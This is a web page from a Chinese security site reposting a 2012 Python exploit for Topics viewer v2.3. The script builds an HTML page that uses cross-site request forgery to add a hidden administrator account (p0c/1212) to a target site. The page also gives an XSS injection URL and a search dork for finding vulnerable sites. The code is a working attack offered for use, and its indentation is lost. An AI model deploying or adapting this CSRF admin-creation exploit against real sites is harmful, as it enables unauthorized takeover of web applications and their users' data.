首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Topics viewer v 2.3 csrf (Add Admin) / XSS Vulnerabilites
来源:http://nilehoster.com/default/topicsviewer 作者:Cyber-Crystal 发布时间:2012-05-15  
#!/usr/bin/env python
########################################################################
# Title    : Topics viewer v 2.3 csrf Add Admin and XSS
# Author   : Cyber-Crystal
# Version  : 2.3
# Homepage : http://nilehoster.com/default/topicsviewer
# Dork     : "Programmed by : Nilehoster.com"
# Tested on: Win/7
# Based on POC : http://vb.ehcommunity.com/showthread.php?t=70682
# CVE : 14 May 2012
#---------------------------------------------------------------------
# ^_^ > snc0pe | secure-x41 | Dmar al3noOoz | al-swisre || All
#
#
# Xss Exploit is Here :
# http://localhost//admincp/edit_block.php?id=XSS

import sys
import string
import os


def banner():
print '''
----------------------------------
Topics viewer v 2.3 csrf Add Admin
----------------------------------

[+] python Exploit.py http://www.exp.com 
'''
if os.name == "nt":
os.system("cls")
os.system("color e")
else :
os.system('clear')

if len(sys.argv) < 2:
banner()
sys.exit()

vic = sys.argv[1].replace("http://","").replace("/","")
file = open("Exploit.html", "w")


db = ("<html>\n"
"<body>\n"
"<form action='http://"+vic+"/admincp/main.php?op=add-admin' method='post' name='sdf'>\n"
"<input type='text' name='u_name' value='p0c' />\n"
"<input type='text' name='u_m_pass' value='1212' />\n"
"<input type='text' name='u_email' value='p0c@p0c.com' />\n"
"<input type='text' name='verification' value='101010'/> <!-- Any number-->\n"
"<script>document.xss.submit();</script><br />\n"
"<input type='submit' value='Exploit'/>\n"
"</form>\n"
"</body>\n"
"</html>\n")

file.write(db)
print "Createing ...\n"
print "user Name And Password ...\n"
print "User : p0c \t Pass : 1212"

# The End

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NEC Backdoor Administrative Ac
·TFTP Server 1.4 ST(RRQ) Buffer
·ABBS Media Player 3.1 Buffer O
·Universal Reader 1.16.740.0 De
·Firefox 8/9 AttributeChildRemo
·Multimedia Builder 4.9.8 Malic
·AnvSoft Any Video Converter 4.
·linux/x86 execve(/bin/dash) 42
·Distinct TFTP 3.01 Writable Di
·Linux/x86 - polymorphic espeak
·WikkaWiki 1.3.2 Spam Logging P
·SkinCrafter ActiveX Control ve
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved